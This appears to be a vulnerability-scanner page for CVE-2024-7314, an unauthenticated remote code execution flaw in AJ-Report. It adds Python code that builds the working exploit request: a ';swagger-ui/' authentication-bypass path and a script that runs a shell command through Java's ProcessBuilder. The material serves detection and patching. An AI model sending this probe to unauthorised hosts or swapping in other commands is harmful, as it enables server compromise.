CVE-2024-7314 Scanner
CVE-2024-7314 Scanner - Remote Code Execution (RCE) vulnerability in AJ-Report
Short Info
Level: Critical
Scan Type: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 10 days 10 hours
Scan only one: Domain, Subdomain, IPv4
Toolbox: -
AJ-Report is an open-source reporting platform used by developers and organizations to build and share business intelligence dashboards and reports. It is integrated into enterprise systems to render customizable datasets and present metrics to decision-makers. Developed by Anji-Plus, the software is commonly found in backend administration panels and reporting modules of Java applications. Users typically deploy AJ-Report in cloud environments or on local networks to provide interactive data visualization. Its flexibility and Java-based architecture make it attractive for systems that need data integration and real-time reporting. Because it evaluates user-supplied scripts on the server, however, a script-injection flaw in it translates directly into code execution, which makes it a target for exploitation.
This scanner detects a critical Remote Code Execution vulnerability in AJ-Report versions prior to 1.4.1. The flaw combines an authentication bypass with server-side script evaluation: an unauthenticated attacker can submit a script that the application evaluates, giving arbitrary code execution on the server. It is triggered with a specially crafted HTTP POST request whose path carries an appended path segment that defeats the authentication check. The flaw is rated critical because it gives a remote attacker full control of the host without any credentials. The `validationRules` field of the request is evaluated as a script without authentication, and an attacker can use it to exfiltrate sensitive data or plant backdoors for persistent access.
Technically, the vulnerability lies in the `/dataSetParam/verification;swagger-ui/` endpoint. The `;swagger-ui/` suffix is treated as a URL path parameter and discarded when the request is routed, so the request still reaches the `/dataSetParam/verification` handler, while the authentication check sees the whitelisted `swagger-ui` string in the URL and lets the request through. The JSON POST body carries a script in the `validationRules` parameter, which the server hands to its Java script engine (a JavaScript engine with access to Java classes) for evaluation. The injected script starts a process that runs a shell command (e.g. `id`) and returns the process's output stream contents in the response. The scanner detects the flaw by looking for UNIX-style `uid=`/`gid=` identifiers in the response body, which show that the command executed. The request must be sent with the correct headers, in particular a JSON `Content-Type`, for the endpoint to evaluate the payload and for the check to be reliable.
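The following is an added example, not the scanner's or the AJ-Report project's own code. It assembles the probe request described above (the endpoint path with the `;swagger-ui/` suffix, a JSON body whose `validationRules` field runs `id` and returns its output), classifies a response as vulnerable only when it carries `uid=`/`gid=` output, and models why the suffix defeats an allow-list check. The JSON field names other than `validationRules`, the exact script text, and the `naive_whitelist_allows` logic are assumptions; the sample responses are constructed for illustration.

```python
"""Probe builder and response classifier for the AJ-Report RCE check.

Added example, not code from the scanner vendor or the AJ-Report project.
Assumptions not stated on the page: the JSON body field names other than
`validationRules`, the exact script text, and the allow-list logic modelled
in naive_whitelist_allows().
"""
import json
import re

# Endpoint named on the page; the ';swagger-ui/' suffix is the auth-bypass trigger.
PROBE_PATH = "/dataSetParam/verification;swagger-ui/"

# Script placed in `validationRules`: starts `id` and returns its stdout, as the page
# describes. The verification() wrapper and variable names are assumptions.
# `id` is used because its output (uid=/gid=) is harmless and unambiguous to detect.
VALIDATION_SCRIPT = (
    "function verification(data){"
    "var p = new java.lang.ProcessBuilder('id').start();"
    "var r = new java.io.BufferedReader(new java.io.InputStreamReader(p.getInputStream()));"
    "var out = ''; var line;"
    "while ((line = r.readLine()) != null) { out += line; }"
    "return out;}"
)

# id(1) prints 'uid=<n>(name) gid=<n>(name) ...'; the parenthesised names are optional.
ID_OUTPUT_RE = re.compile(r"\buid=\d+(?:\([^)]*\))?\s+gid=\d+(?:\([^)]*\))?")


def build_probe(base_url: str) -> dict:
    """Return the request the check sends: method, URL, headers and JSON body."""
    body = {
        "ParamName": "probe",      # assumed field names, see module docstring
        "ParamDesc": "",
        "ParamType": "",
        "SampleItem": "1",
        "Mandatory": True,
        "validationRules": VALIDATION_SCRIPT,  # parameter named on the page
    }
    return {
        "method": "POST",
        "url": base_url.rstrip("/") + PROBE_PATH,
        # A JSON Content-Type is required for the endpoint to parse the body.
        "headers": {"Content-Type": "application/json", "Accept": "*/*"},
        "body": json.dumps(body),
    }


def is_vulnerable_response(status: int, body: str) -> bool:
    """True only when a 200 response carries id(1) output, i.e. the script ran.

    Matching 'uid=<n> gid=<n>' rather than the bare word 'uid' avoids false
    positives from error messages that merely mention the term."""
    return status == 200 and ID_OUTPUT_RE.search(body) is not None


def routed_path(raw_path: str) -> str:
    """Path as a servlet router resolves it: a ';param' suffix on any segment is
    dropped, so '/x;swagger-ui/' is dispatched to the handler for '/x/'."""
    return "/".join(seg.split(";", 1)[0] for seg in raw_path.split("/"))


def naive_whitelist_allows(raw_path: str) -> bool:
    """Hypothetical allow-list check of the kind the bypass defeats: it inspects the
    raw URL and admits anything that looks like a Swagger resource."""
    return "swagger-ui" in raw_path


if __name__ == "__main__":
    probe = build_probe("http://aj-report.example.test")
    print(probe["method"], probe["url"])
    # Constructed sample responses, not captured from a real host.
    vulnerable = '{"code":200,"data":"uid=1000(tomcat) gid=1000(tomcat) groups=1000(tomcat)"}'
    blocked = '{"code":401,"msg":"unauthorized"}'
    print("vulnerable:", is_vulnerable_response(200, vulnerable))
    print("blocked:", is_vulnerable_response(401, blocked))
    print("router sees:", routed_path(PROBE_PATH))
    print("allow-list admits probe:", naive_whitelist_allows(PROBE_PATH))
```

The same URL yields two different answers: the allow-list admits it because the raw path contains `swagger-ui`, while the router strips the path parameter and dispatches it to the dataset-parameter handler. A fix therefore has to apply the authentication check to the normalized path the router actually dispatches on, not to the raw request URL.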
Exploitation of this vulnerability can result in full compromise of the host. An attacker can run arbitrary system commands with the privileges of the AJ-Report service account, read sensitive data, create accounts, or install malware. It also opens the door to lateral movement within the affected network, putting other systems at risk. Organizations running vulnerable versions are exposed to data breaches, financial loss, and compliance violations. In cloud deployments, an attacker who gains a foothold on the server may reach credentials and metadata that give access to wider infrastructure. The attack requires neither credentials nor user interaction, which makes internet-exposed instances especially dangerous.